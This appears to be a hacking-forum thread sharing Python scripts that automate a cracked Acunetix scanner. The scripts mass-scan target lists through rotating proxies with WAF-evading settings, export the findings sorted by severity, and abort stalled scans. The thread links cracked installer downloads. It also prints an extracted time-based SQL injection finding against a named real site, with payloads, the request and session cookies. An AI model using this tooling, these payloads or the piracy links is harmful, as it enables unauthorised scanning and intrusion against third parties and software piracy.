Acunetix Automation

[MrDark]

Based on: https://github.com/danialhalo/AcuAutomate I have updated the script a lot to include more functionality.

I suggest not adding more then 3-4k targets in your links input file, acunetix is not designed to handle a lot of targets in general and it might cause problems.

New functions and improvements:

• Adds targets way faster without any errors as original script does ( updated schema for input file and others )
• Scan speed selection ( slow, moderate, fast, faster )
• Included custom user agent selection
• Included stop scans function to mass stop all scans
• Included proxy function to work with file proxy.txt in ip:port format or user:pass:ip:port 1 per line ( only http/https proxy works - not socks )
• Included list scan profiles
• Updated help with everything new and command examples + scan profiles
• Multiple other changes

If there are any bugs, problems or new functions that you want included let me know.


Script:

#!/usr/bin/env python3

import requests
import json
import argparse
import validators
import sys
import concurrent.futures
import itertools

from argparse import RawTextHelpFormatter

requests.packages.urllib3.disable_warnings()

# --- CONFIGURATION ---
try:
    with open('config.json') as config_file:
        config = json.load(config_file)
except FileNotFoundError:
    print("[!] CRITICAL: 'config.json' not found. Please create it with your Acunetix URL, port, and API key.")
    sys.exit(1)
except json.JSONDecodeError:
    print("[!] CRITICAL: 'config.json' is not valid JSON.")
    sys.exit(1)

# Dictionary mapping short aliases to official Acunetix profile names
PROFILE_ALIASES = {
    "full": "Full Scan",
    "high": "Critical / High Risk",
    "medium": "Critical / High / Medium Risk",
    "xss": "Cross-site Scripting",
    "sql": "SQL Injection",
    "weakpass": "Weak Passwords",
    "crawl": "Crawl Only",
    "owasp": "OWASP Top 10",
    "pci": "PCI checks",
    "without": "Without Top 25",
    "malware": "Malware Scan"
}

tarurl = config['url']+":"+str(config['port'])
headers = {
    "X-Auth": config['api_key'],
    "Content-Type": "application/json"
}

# --- PROXY FUNCTION ---
def load_and_parse_proxies(file_path="proxy.txt"):
    parsed_proxies = []
    try:
        with open(file_path, 'r') as f:
            for line in f:
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                
                parts = line.split(':')
                proxy_config = {"enabled": True, "protocol": "http"}
                
                if len(parts) == 2:
                    proxy_config["address"] = parts[0]
                    proxy_config["port"] = int(parts[1])
                elif len(parts) == 4:
                    proxy_config["username"] = parts[0]
                    proxy_config["password"] = parts[1]
                    proxy_config["address"] = parts[2]
                    proxy_config["port"] = int(parts[3])
                else:
                    print(f"[!] Skipping invalid proxy format in {file_path}: {line}")
                    continue
                parsed_proxies.append(proxy_config)

        if parsed_proxies:
            print(f"[*] Successfully loaded and parsed {len(parsed_proxies)} proxies from {file_path}.")
        else:
            print(f"[!] Warning: Proxy file '{file_path}' was found but contained no valid proxies.")
            
    except FileNotFoundError:
        print(f"[!] Warning: Proxy file '{file_path}' not found. Scans will run without proxies.")
    except (ValueError, IndexError) as e:
        print(f"[!] Error parsing proxy file: {e}. Please check the format.")

    return parsed_proxies


# --- API FUNCTIONS ---
def get_scan_profiles():
    url = f"{tarurl}/api/v1/scanning_profiles"
    try:
        response = requests.get(url, headers=headers, timeout=30, verify=False)
        response.raise_for_status()
        profiles_data = response.json()
        
        if isinstance(profiles_data, dict) and "scanning_profiles" in profiles_data:
            profiles_list = profiles_data["scanning_profiles"]
        else:
            print("[!] Unexpected API response format. Could not find 'scanning_profiles' key.")
            return {}

        return {profile['name']: profile['profile_id'] for profile in profiles_list}

    except requests.exceptions.RequestException as e:
        print(f"[!] Error fetching scan profiles: {e}")
        return {}
    except (KeyError, json.JSONDecodeError) as e:
        print(f"[!] Error parsing scan profiles: {e}")
        return {}

def list_profiles():
    print("[*] Fetching available scan profiles...")
    profiles = get_scan_profiles()
    if not profiles:
        print("[!] No scan profiles found or could not connect to API.")
        return
    
    alias_lookup = {v: k for k, v in PROFILE_ALIASES.items()}
    
    print("\n--- Available Scan Profiles ---")
    for name, profile_id in profiles.items():
        alias = alias_lookup.get(name, "N/A")
        print(f"- Alias: \"{alias}\"\n  Name:  \"{name}\"\n  ID:    {profile_id}\n")
    print("-----------------------------\n")
    print("Use the 'Alias' or the full 'Name' in the -t/--type argument.")


def create_scan(target_url, scan_type, speed, user_agent, scan_profiles, proxy_config=None):
    profile_id = scan_profiles.get(scan_type)

    if not profile_id:
        print(f"[!] Scan profile '{scan_type}' not found. Attempting to use 'Full Scan' as default.")
        profile_id = scan_profiles.get(PROFILE_ALIASES.get("full"))
        if not profile_id:
            print(f"\n[!] CRITICAL: Default profile 'Full Scan' also not found. Aborting scan for {target_url}.")
            print("[*] Available profiles are:", ", ".join(f'"{p}"' for p in scan_profiles.keys()))
            return

    def add_and_configure_target(url, speed_setting, ua_string, default_profile_id, proxy_settings):
        create_data = {"address": url, "description": url, "criticality": 10}
        target_id = None
        try:
            response = requests.post(f"{tarurl}/api/v1/targets", data=json.dumps(create_data), headers=headers, timeout=30, verify=False)
            response.raise_for_status()
            target_id = response.json()['target_id']
            print(f"[*] Target created for {url} with ID: {target_id}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error adding target {url}: {e}")
            return None

        config_data = {'default_scanning_profile_id': default_profile_id}
        if speed_setting: config_data['scan_speed'] = speed_setting
        if ua_string: config_data['user_agent'] = ua_string
        if proxy_settings:
            config_data['proxy'] = proxy_settings
            print(f"[*] Assigning proxy {proxy_settings['address']}:{proxy_settings['port']} to {url}")


        if target_id:
            config_url = f"{tarurl}/api/v1/targets/{target_id}/configuration"
            try:
                print(f"[*] Applying configuration to target {target_id}...")
                response = requests.patch(config_url, data=json.dumps(config_data), headers=headers, timeout=30, verify=False)
                response.raise_for_status()
            except requests.exceptions.RequestException as e:
                print(f"[!] Warning: Failed to apply configuration for {url}. Error: {e}")
        
        return target_id

    target_id = add_and_configure_target(target_url, speed, user_agent, profile_id, proxy_config)
    if not target_id:
        print(f"[!] Failed to create target for {target_url}. Aborting scan.")
        return

    scan_data = {
        "target_id": target_id,
        "profile_id": profile_id,
        "schedule": {"disable": False, "start_date": None, "time_sensitive": False},
    }

    try:
        actual_profile_name = next((name for name, pid in scan_profiles.items() if pid == profile_id), "Unknown")
        response = requests.post(f"{tarurl}/api/v1/scans", headers=headers, data=json.dumps(scan_data), verify=False, timeout=30)
        response.raise_for_status()
        print(f"[*] Scan successfully launched for {target_url} using profile '{actual_profile_name}'.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error launching scan for {target_url}: {e}")


def scan_targets_from_file(file_path, scan_type, speed, user_agent, scan_profiles, proxies=None):
    try:
        with open(file_path) as f:
            targets = [x.strip() for x in f.readlines() if x.strip()]
        
        valid_targets = []
        for target in targets:
            if not target.startswith(("http://", "https://")): target = "https://" + target
            if validators.url(target):
                valid_targets.append(target)
            else:
                print(f"[!] Skipping invalid URL from file: {target}")

        if not valid_targets:
            print("[!] No valid URLs found in the file.")
            return

        print(f"[*] Found {len(valid_targets)} valid targets. Starting scans...")

        with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
            if proxies:
                proxy_cycler = itertools.cycle(proxies)
                futures = {executor.submit(create_scan, target, scan_type, speed, user_agent, scan_profiles, next(proxy_cycler)): target for target in valid_targets}
            else:
                futures = {executor.submit(create_scan, target, scan_type, speed, user_agent, scan_profiles, None): target for target in valid_targets}
            
            for future in concurrent.futures.as_completed(futures):
                target = futures[future]
                try:
                    future.result()
                except Exception as e:
                    print(f"[!] An exception occurred while processing {target}: {e}")

    except FileNotFoundError:
        print(f"[!] Error: The file '{file_path}' was not found.")
    except Exception as e:
        print(f"[!] An unexpected error occurred while reading the file: {e}")

def stop_scan(scan_id):
    url = f"{tarurl}/api/v1/scans/{scan_id}/abort"
    try:
        requests.post(url, headers=headers, verify=False, timeout=60)
        print(f"[-] Abort request sent for scan ID: {scan_id}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Failed to stop scan {scan_id}. Error: {e}")

def stop_specific_scan(target):
    try:
        url = f"{tarurl}/api/v1/scans?q=status:processing,queued;target_address:{target}"
        response = requests.get(url, headers=headers, verify=False)
        response.raise_for_status()
        scans = response.json()["scans"]
        if not scans:
            print(f"[!] No active or queued scan found for target: {target}")
            return
        for scan in scans:
            print(f"[*] Found active scan for '{target}'. ID: {scan['scan_id']}")
            stop_scan(scan["scan_id"])
    except requests.exceptions.RequestException as e:
        print(f"[!] Error retrieving scans to stop. Error: {e}")

def stop_all_scans():
    print("[*] Attempting to stop all active and queued scans...")
    try:
        url = f"{tarurl}/api/v1/scans?q=status:processing,queued"
        response = requests.get(url, headers=headers, verify=False)
        response.raise_for_status()
        scans = response.json().get("scans", [])
        if not scans:
            print("[*] No active or queued scans found to stop.")
            return
        with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
            executor.map(stop_scan, [scan['scan_id'] for scan in scans])
        print(f"[+] Total abort requests sent: {len(scans)}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Network error while fetching scans: {e}")
    except Exception as e:
        print(f"[!] An unexpected error occurred: {e}")

# --- MAIN EXECUTION ---
if __name__ == "__main__":
    banner = r"""
                      __  _         ___
  ____ ________  ____  ___  / /_(_)   __  _____/ (_)
 / __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / /  __/ /_/ />  </_____/ /__/ / / 
\__,_/\___/\__,_/_/ /_/\___/\__/_/|_|       \___/_/_/   
 -: Coded by Danial Halo & Updated by By MrDark :-
    """
    
    profile_choices = ", ".join(PROFILE_ALIASES.keys())
    
    parser = argparse.ArgumentParser(
        description="""
AcuAutomate: Unofficial Acunetix CLI
------------------------------------
A command-line tool to automate Acunetix vulnerability scans.
It allows you to start, stop, and manage scans directly from your terminal,
making it perfect for integration into CI/CD pipelines or batch scanning operations.
""",
        epilog=f"""
Commands & Options:
---------------------------------------------------------------------------------------------
scan                     ▶ Launch a new scan. Requires one of -d or -f.

  -d, --domain DOMAIN    A single target domain to scan (e.g., example.com).
  -f, --file FILE        A file with target domains, one per line.
  -t, --type TYPE        Scan profile alias. (Default: full)
                           Choices: {{ {profile_choices} }}
  -s, --speed SPEED      Set scan speed. Choices: {{ slow, moderate, fast, faster }}
  -u, --user-agent UA    Set a custom User-Agent for the scan.
  -p, --proxy            Enable proxies for the scan. Requires a 'proxy.txt' file.
                           Create 'proxy.txt' and add proxies one per line.
                           Format (no auth):    ip:port
                           Format (with auth):  user:pass:ip:port

---------------------------------------------------------------------------------------------
stop                     ⏹ Stop a scan. Requires one of -d or -a.

  -d, --domain DOMAIN    The target domain of the scan to stop.
  -a, --all              Stop ALL running and queued scans.

---------------------------------------------------------------------------------------------
list-profiles            📋 List all available scan profiles and their aliases.

---------------------------------------------------------------------------------------------
Examples:
------------------------------------
# List all available scan profiles
  python3 AcuAutomate.py list-profiles

# Start a specific 'SQL Injection' scan on a single target
  python3 AcuAutomate.py scan -d example.com -t sql

# Start a full scan for all targets in 'links.txt' using a proxy for each one
  python3 AcuAutomate.py scan -f links.txt --proxy
 
# Start an advanced scan on multiple targets that bypasses WAF and acts like a real human ( you can include --proxy if you have proxy in your proxy.txt file / 1 per line - it will assign different proxy to targets from file in ip:port format or user:pass:ip:port format )
 python3 AcuAutomate.py scan -f links.txt -s slow -u "Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0" -t high

# Stop an active scan for a specific domain
  python3 AcuAutomate.py stop -d example.com
""",
        formatter_class=RawTextHelpFormatter
    )
    
    if len(sys.argv) < 2:
        print(banner)
        parser.print_help()
        sys.exit(1)
        
    print(banner)
    
    subparsers = parser.add_subparsers(dest="action", required=True)
    
    # --- SCAN SUBPARSER ---
    start_parser = subparsers.add_parser("scan", help=argparse.SUPPRESS)
    start_group = start_parser.add_mutually_exclusive_group(required=True)
    start_group.add_argument("-d", "--domain", help="A single target domain")
    start_group.add_argument("-f", "--file", help="A file with target domains")
    start_parser.add_argument("-t", "--type", default="full", help="Scan profile alias")
    start_parser.add_argument("-s", "--speed", choices=['slow', 'moderate', 'fast', 'faster'], help="Scan speed")
    start_parser.add_argument("-u", "--user-agent", help="Custom User-Agent")
    start_parser.add_argument("-p", "--proxy", action="store_true", help="Use proxies from proxy.txt for the scan engine")
    
    # --- STOP SUBPARSER ---
    stop_parser = subparsers.add_parser("stop", help=argparse.SUPPRESS)
    stop_group = stop_parser.add_mutually_exclusive_group(required=True)
    stop_group.add_argument("-d", "--domain", help="The target domain of the scan to stop")
    stop_group.add_argument("-a", "--all", action='store_true', help="Stop ALL scans")

    # --- LIST PROFILES SUBPARSER ---
    list_parser = subparsers.add_parser("list-profiles", help=argparse.SUPPRESS)
    
    args = parser.parse_args()
    
    scan_profile_name = PROFILE_ALIASES.get(args.type.lower(), args.type) if hasattr(args, 'type') else None
    
    if args.action == "list-profiles":
        list_profiles()
        
    elif args.action == "scan":
        proxies = load_and_parse_proxies() if args.proxy else []
        
        print("[*] Getting scan profiles from Acunetix...")
        scan_profiles = get_scan_profiles()
        if not scan_profiles:
            print("[!] CRITICAL: Could not retrieve scan profiles from Acunetix. Aborting.")
            sys.exit(1)

        if args.domain:
            target_url = args.domain
            if not target_url.startswith(("http://", "https://")): target_url = "https://" + target_url
            if validators.url(target_url):
                first_proxy = proxies[0] if proxies else None
                create_scan(target_url, scan_profile_name, args.speed, args.user_agent, scan_profiles, first_proxy)
            else:
                print(f"[!] Invalid URL specified: {args.domain}")
        elif args.file:
            scan_targets_from_file(args.file, scan_profile_name, args.speed, args.user_agent, scan_profiles, proxies)
            
    elif args.action == "stop":
        if args.domain: stop_specific_scan(args.domain)
        elif args.all: stop_all_scans()

create config.json in the same directory as the script with the fallowing content:

{
    "url": "https://localhost",
    "port": 3443,
    "api_key": "Your-acunetix-API-key"
}

How to get your acunetix API key? It is simple, after you install acunetix ( how to install is in the README.txt ), login into your webpanel, click on the left upper side on "Administrator", then click on "Profile" and scroll all the way down where you will see "Generate new API key" click it and copy your API key and place it in your config.json. You can also replace localhost with your remote IP address if you have selected your acunetix to be remote during installation so that the API can be accessed remotely.

Acunetix is cracked by this guys and posted on their telegram channel: https://t.me/Pwn3rzs

Latest cracked version:

Acunetix v25.5.250613157 - 17 Jun 2025

Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.5.250613157-Windows-Pwn3rzs-CyberArsenal.rar

Linux: [No installer leaked, yet]

Password: Pwn3rzs

Changelog:

Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v25-5-0-17-june-2025/

Previous cracked version with linux build included:

Acunetix v25.1.250204093 - 17 Feb 2025

Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.1.250204093-Windows-Pwn3rzs-CyberArsenal.rar

Linux: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.1.250204093-Linux-Pwn3rzs-CyberArsenal.7z

Password: Pwn3rzs

⚠️ The installers were provided to us publicly from a user in our forum.
While the signature of the windows installer has been verified, the linux one cannot be checked unless you have an installer your own and hashes will match.
SO BE ADVICED AND ALWAYS USE A VIRTUALIZED AND CONTAINED ENVIRONMENT ⚠️

Changelog:

Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v25-1-2-17-february-2025/

Previous changelogs:
https://www.acunetix.com/changelogs/acunetix-premium/v25-1-1-6-february-2025/
https://www.acunetix.com/changelogs/acunetix-premium/v25-1-0-4-february-2025/

 

[MrDark]

Script to automatically extract all vulnerabilites and sort them by criticality per folder. Critical, High, Medium, Low, Informational

Script will go thru all scans, match vulnerability ids, extract and sort containing all info such as

Vulnerability ID

Scan ID

Target link

Severity

Status

Last Detected

Description

Details

Impact

Recommendation

Request

Response

Each vulnerability will be saved in it's own .txt file , for example one sql injection:

=== Vulnerability ID: 3680221377211664067 ===
Scan ID: 340b7175-00ee-41ab-ac8b-864828872f0e
Target: https://wirexapp.com
Severity: Critical
Status: open
Last Detected: N/A
Description:
N/A

Details:
Path Fragment input <strong><span class="bb-dark">/&lt;s&gt;/[*]</span></strong> was set to <strong><span class="bb-dark">(select(0)from(select(sleep(6)))v)/*&#x27;+(select(0)from(select(sleep(6)))v)+&#x27;&quot;+(select(0)from(select(sleep(6)))v)+&quot;*/</span></strong><br/><br/>

Tests performed:
<ul>
 
 <li>(select(0)from(select(sleep(15)))v)/*&#x27;+(select(0)from(select(sleep(15)))v)+&#x27;&quot;+(select(0)from(select(sleep(15)))v)+&quot;*/ =&gt; <strong>15.02</strong></li>
 
 <li>(select(0)from(select(sleep(15)))v)/*&#x27;+(select(0)from(select(sleep(15)))v)+&#x27;&quot;+(select(0)from(select(sleep(15)))v)+&quot;*/ =&gt; <strong>15.037</strong></li>
 
 <li>(select(0)from(select(sleep(6)))v)/*&#x27;+(select(0)from(select(sleep(6)))v)+&#x27;&quot;+(select(0)from(select(sleep(6)))v)+&quot;*/ =&gt; <strong>6.018</strong></li>
 
 <li>(select(0)from(select(sleep(0)))v)/*&#x27;+(select(0)from(select(sleep(0)))v)+&#x27;&quot;+(select(0)from(select(sleep(0)))v)+&quot;*/ =&gt; <strong>0.03</strong></li>
 
 <li>(select(0)from(select(sleep(3)))v)/*&#x27;+(select(0)from(select(sleep(3)))v)+&#x27;&quot;+(select(0)from(select(sleep(3)))v)+&quot;*/ =&gt; <strong>3.02</strong></li>
 
 <li>(select(0)from(select(sleep(0)))v)/*&#x27;+(select(0)from(select(sleep(0)))v)+&#x27;&quot;+(select(0)from(select(sleep(0)))v)+&quot;*/ =&gt; <strong>0.074</strong></li>
 
 <li>(select(0)from(select(sleep(6)))v)/*&#x27;+(select(0)from(select(sleep(6)))v)+&#x27;&quot;+(select(0)from(select(sleep(6)))v)+&quot;*/ =&gt; <strong>6.033</strong></li>
</ul>
<br/><br/>Original value: <strong>getAssetRisksHelp</strong>




Impact:
An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.

Recommendation:
Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.

Request:
GET /chainlink/(select(0)from(select(sleep(6)))v)%2f*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*%2f HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://wirexapp.com/

Cookie: AMP_MKTG_df99f09551=JTdCJTdE; AMP_df99f09551=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjIwZTViNDhlZC0yYTIwLTQwNmMtOTE0Ni1hNzRmZmY2MDVkOGIlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzUyOTMyNjQ3NDM2JTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJsYXN0RXZlbnRUaW1lJTIyJTNBMTc1MjkzMjczNTUxMyUyQyUyMmxhc3RFdmVudElkJTIyJTNBNDc5JTJDJTIycGFnZUNvdW50ZXIlMjIlM0EzMSU3RA==; __cf_bm=14xFI6SEr20mfdTDerUKzuA8MRGvLq.sO8zBCK1BemQ-1752932632-1.0.1.1-2jMA4ckCwRcF0eTxaEM_fcvzP1VOf14fZvEcOqfiAYchFxVh.u7DeZpmn.WAV8nfbZ9J1tnbaZMaNj.7Rxb3waftgIWgzTx2uqOjXGxlg74; ai_session=T6vDE|1752932648112.5|1752932711036.9; ai_user=Z9Onx|2025-07-18T09:18:22.441Z; wx-ipcountry=NL; wx-userLanguage=%7B%22locale%22%3A%22en%22%2C%22code%22%3A%22en%22%2C%22name%22%3A%22English%22%7D

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36

Host: wirexapp.com

Connection: Keep-alive


Response:
N/A

==================================================

Code:

import requests
import json
import os
from concurrent.futures import ThreadPoolExecutor
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

SEVERITY_FOLDERS = {
    4: "Critical",
    3: "High",
    2: "Medium",
    1: "Low",
    0: "Informational"
}

def create_output_structure():
    main_folder = "ALL-ACUNETIX-VULNS-EXTRACTED"
    os.makedirs(main_folder, exist_ok=True)
    
    for folder in SEVERITY_FOLDERS.values():
        os.makedirs(os.path.join(main_folder, folder), exist_ok=True)
    
    return main_folder

def load_config():
    try:
        with open('config.json', 'r') as config_file:
            config = json.load(config_file)
            if not all(k in config for k in ['url', 'port', 'api_key']):
                raise ValueError("Missing 'url', 'port', or 'api_key' in config.json")
            return config
    except FileNotFoundError:
        print("Error: config.json not found. Please create a config file.")
        exit(1)
    except json.JSONDecodeError:
        print("Error: Invalid JSON in config.json. Please check its format.")
        exit(1)
    except ValueError as e:
        print(f"Configuration Error: {e}")
        exit(1)

def init_session(api_key):
    session = requests.Session()
    session.headers.update({
        'X-Auth': api_key,
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    })
    session.verify = False 
    return session

def get_scans_and_process_in_batches(session, base_url, main_folder, limit=100):
    offset = 0
    total_scans_processed = 0
    
    print(f"Starting to fetch and process scans with a limit of {limit} per request...")

    while True:
        try:
            params = {'l': limit, 'c': offset}
            response = session.get(f"{base_url}/api/v1/scans", params=params)
            response.raise_for_status()
            
            data = response.json()
            scans_batch = data.get('scans', [])
            
            if not scans_batch:
                print("No more scans found in this batch. Ending pagination.")
                break
            
            print(f"Fetched {len(scans_batch)} scans (Current total processed: {total_scans_processed + len(scans_batch)}). Processing this batch...")
            
            for scan in scans_batch:
                process_scan(session, base_url, main_folder, scan)
                total_scans_processed += 1
            
            offset += limit
            
        except requests.exceptions.RequestException as e:
            print(f"Error fetching scans at offset {offset}: {e}")
            break
        except json.JSONDecodeError:
            print(f"Error decoding JSON response for scans at offset {offset}.")
            break
            
    print(f"Finished fetching and processing all scans. Total scans processed: {total_scans_processed}")
    return total_scans_processed

def get_scan_results(session, base_url, scan_id):
    try:
        response = session.get(f"{base_url}/api/v1/scans/{scan_id}/results")
        response.raise_for_status()
        results = response.json().get('results', [])
        return results[0].get('result_id') if results else None
    except requests.exceptions.RequestException as e:
        print(f"Error fetching results for scan {scan_id}: {e}")
        return None

def get_scan_vulnerabilities(session, base_url, scan_id, result_id, limit=100):
    all_vulnerabilities = []
    offset = 0
    total_vulns_fetched = 0
    
    print(f"  Fetching vulnerabilities for scan {scan_id} (result {result_id})...")

    while True:
        try:
            params = {'l': limit, 'c': offset}
            response = session.get(f"{base_url}/api/v1/scans/{scan_id}/results/{result_id}/vulnerabilities", params=params)
            response.raise_for_status()
            
            data = response.json()
            vulns_batch = data.get('vulnerabilities', [])
            
            if not vulns_batch:
                break
            
            all_vulnerabilities.extend(vulns_batch)
            total_vulns_fetched += len(vulns_batch)
            
            offset += limit

        except requests.exceptions.RequestException as e:
            print(f"  Error fetching vulnerabilities for scan {scan_id} at offset {offset}: {e}")
            break
        except json.JSONDecodeError:
            print(f"  Error decoding JSON response for vulnerabilities of scan {scan_id} at offset {offset}.")
            break
            
    print(f"  Finished fetching vulnerabilities for scan {scan_id}. Total vulnerabilities: {len(all_vulnerabilities)}")
    return all_vulnerabilities

def get_vulnerability_details(session, base_url, scan_id, result_id, vuln_id):
    try:
        response = session.get(f"{base_url}/api/v1/scans/{scan_id}/results/{result_id}/vulnerabilities/{vuln_id}")
        response.raise_for_status()
        return response.json()
    except requests.exceptions.RequestException as e:
        print(f"Error fetching details for vulnerability {vuln_id}: {e}")
        return None

def sanitize_filename(name):
    invalid_chars = '<>:"/\\|?*'
    for char in invalid_chars:
        name = name.replace(char, '_')
    return name.strip()

def save_vulnerability(main_folder, vuln_details):
    severity = vuln_details.get('severity', 0)
    severity_folder = SEVERITY_FOLDERS.get(severity, "Informational")
    vuln_type = vuln_details.get('vt_name', 'Unknown')
    
    filename = sanitize_filename(f"{vuln_type}_Scan{vuln_details.get('scan_id', 'N/A')}_Vuln{vuln_details.get('vuln_id', 'N/A')}.txt")
    filepath = os.path.join(main_folder, severity_folder, filename)
    
    try:
        with open(filepath, 'w', encoding='utf-8') as f:
            f.write(f"=== Vulnerability ID: {vuln_details.get('vuln_id', 'N/A')} ===\n")
            f.write(f"Scan ID: {vuln_details.get('scan_id', 'N/A')}\n")
            f.write(f"Target: {vuln_details.get('target_fqdn', 'N/A')}\n") 
            f.write(f"Severity: {severity_folder}\n")
            f.write(f"Status: {vuln_details.get('status', 'N/A')}\n")
            f.write(f"Last Detected: {vuln_details.get('last_seen', 'N/A')}\n")
            f.write(f"Description:\n{vuln_details.get('vt_description', 'N/A')}\n\n")
            f.write(f"Details:\n{vuln_details.get('details', 'N/A')}\n\n")
            f.write(f"Impact:\n{vuln_details.get('impact', 'N/A')}\n\n")
            f.write(f"Recommendation:\n{vuln_details.get('recommendation', 'N/A')}\n\n")
            f.write(f"Request:\n{vuln_details.get('request', 'N/A')}\n\n")
            f.write(f"Response:\n{vuln_details.get('response', 'N/A')}\n\n")
            f.write("="*50 + "\n\n")
        print(f"  Saved: {filename} in {severity_folder}/")
    except IOError as e:
        print(f"Error saving vulnerability {filename}: {e}")

def process_vulnerability(session, base_url, main_folder, scan_id, result_id, vuln, target_fqdn):
    vuln_id = vuln.get('vuln_id')
    vuln_type = vuln.get('vt_name', 'Unknown')
    
    print(f"    Processing {vuln_type} (ID: {vuln_id}) for target {target_fqdn}")
    
    vuln_details = get_vulnerability_details(session, base_url, scan_id, result_id, vuln_id)
    if vuln_details:
        vuln_details['scan_id'] = scan_id
        vuln_details['target_fqdn'] = target_fqdn
        save_vulnerability(main_folder, vuln_details)

def process_scan(session, base_url, main_folder, scan):
    scan_id = scan.get('scan_id')
    
    target_fqdn = 'N/A'
    target_id = None

    target_info_from_scan = scan.get('target', {})
    if target_info_from_scan:
        target_id = target_info_from_scan.get('target_id')
        target_fqdn = target_info_from_scan.get('address')
        if not target_fqdn:
            target_fqdn = target_info_from_scan.get('fqdn')
            
    print(f"Processing scan {scan_id} (Initial Target FQDN: {target_fqdn}, Target ID: {target_id})....")
    print(f"  Debug: Full scan target object: {target_info_from_scan}")

    if target_fqdn == 'N/A' and target_id and target_id != 'N/A':
        print(f"  Target FQDN not found in scan object. Attempting to fetch target details for ID: {target_id}")
        try:
            target_response = session.get(f"{base_url}/api/v1/targets/{target_id}")
            target_response.raise_for_status()
            target_details = target_response.json()
            fetched_fqdn = target_details.get('address')
            if not fetched_fqdn:
                fetched_fqdn = target_details.get('fqdn')

            if fetched_fqdn:
                target_fqdn = fetched_fqdn
                print(f"  Successfully fetched target FQDN: {target_fqdn} for ID: {target_id}")
            else:
                print(f"  Fetched target details but 'address' or 'fqdn' key was missing for ID: {target_id}")
        except requests.exceptions.RequestException as e:
            print(f"  Error fetching target details for ID {target_id}: {e}")
        except json.JSONDecodeError:
            print(f"  Error decoding JSON response for target details of ID {target_id}.")

    result_id = get_scan_results(session, base_url, scan_id)
    if not result_id:
        print(f"  No results found for scan {scan_id}. Skipping.")
        return
    
    vulnerabilities = get_scan_vulnerabilities(session, base_url, scan_id, result_id)
    if not vulnerabilities:
        print(f"  No vulnerabilities found for scan {scan_id}. Skipping.")
        return
    
    with ThreadPoolExecutor(max_workers=5) as executor:
        futures = [executor.submit(process_vulnerability, session, base_url, main_folder, scan_id, result_id, vuln, target_fqdn) for vuln in vulnerabilities]
        for future in futures:
            try:
                future.result()
            except Exception as exc:
                print(f"  Vulnerability processing generated an exception: {exc}")

def main():
    banner = r"""
**********************************************
* ACUNETIX VULN EXTRACTOR        *
* Coded by MrDark             *
**********************************************
"""
    print(banner)

    main_folder = create_output_structure()
    print(f"Created output folder structure at: {os.path.abspath(main_folder)}")
    
    config = load_config()
    base_url = f"{config['url']}:{config['port']}"
    api_key = config['api_key']
    
    session = init_session(api_key)
    
    total_scans_processed = get_scans_and_process_in_batches(session, base_url, main_folder)
        
    print(f"Vulnerability export completed. Total scans processed: {total_scans_processed}. Results saved in: {os.path.abspath(main_folder)}")

if __name__ == "__main__":
    main()

Script is API based same as the script in the first post, so make sure you have config.json created with the fallowing content: ( replace Your-acunetix-API-key with your acual acunetix API key )

{
    "url": "https://localhost",
    "port": 3443,
    "api_key": "Your-acunetix-API-key"
}

 

[k4rk4j0i]

https://xss.pro/threads/114216/

 

[MrDark]

Since acunetix is bugged in scanning multiple targets, many will remain frozen, scanning for hours or days, I made a script that will check your active scans pass more then X hours ( configurable in the script ) it will stop them to allow others to start.

As all the above scripts, using config.json containing your api of acunetix, ip and port.

You will find this very useful.

#!/usr/bin/env python3

import requests
import json
import time
import sys
from datetime import datetime, timezone

# --- USER CONFIGURATION ---
CHECK_INTERVAL_MINUTES = 30
MAX_SCAN_DURATION_HOURS = 1
# --------------------------

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def load_config():
    try:
        with open('config.json') as config_file:
            config = json.load(config_file)
        if not all(k in config for k in ['url', 'port', 'api_key']):
            raise ValueError("Configuration file must contain 'url', 'port', and 'api_key'.")
        return config
    except FileNotFoundError:
        print("[!] CRITICAL: 'config.json' not found. Please create it with your Acunetix URL, port, and API key.")
        sys.exit(1)
    except (json.JSONDecodeError, ValueError) as e:
        print(f"[!] CRITICAL: Error in 'config.json': {e}")
        sys.exit(1)

def get_running_scans(session, base_url):
    api_url = f"{base_url}/api/v1/scans?q=status:processing"
    try:
        response = session.get(api_url, timeout=30)
        response.raise_for_status()
        return response.json().get("scans", [])
    except requests.exceptions.RequestException as e:
        print(f"[!] Network Error: Could not fetch running scans. {e}")
        return []
    except json.JSONDecodeError:
        print("[!] API Error: Could not decode the JSON response from the server.")
        return []

def stop_scan(session, base_url, scan_id, target_address):
    api_url = f"{base_url}/api/v1/scans/{scan_id}/abort"
    try:
        print(f"    [-] Sending abort request for scan ID: {scan_id} ({target_address})")
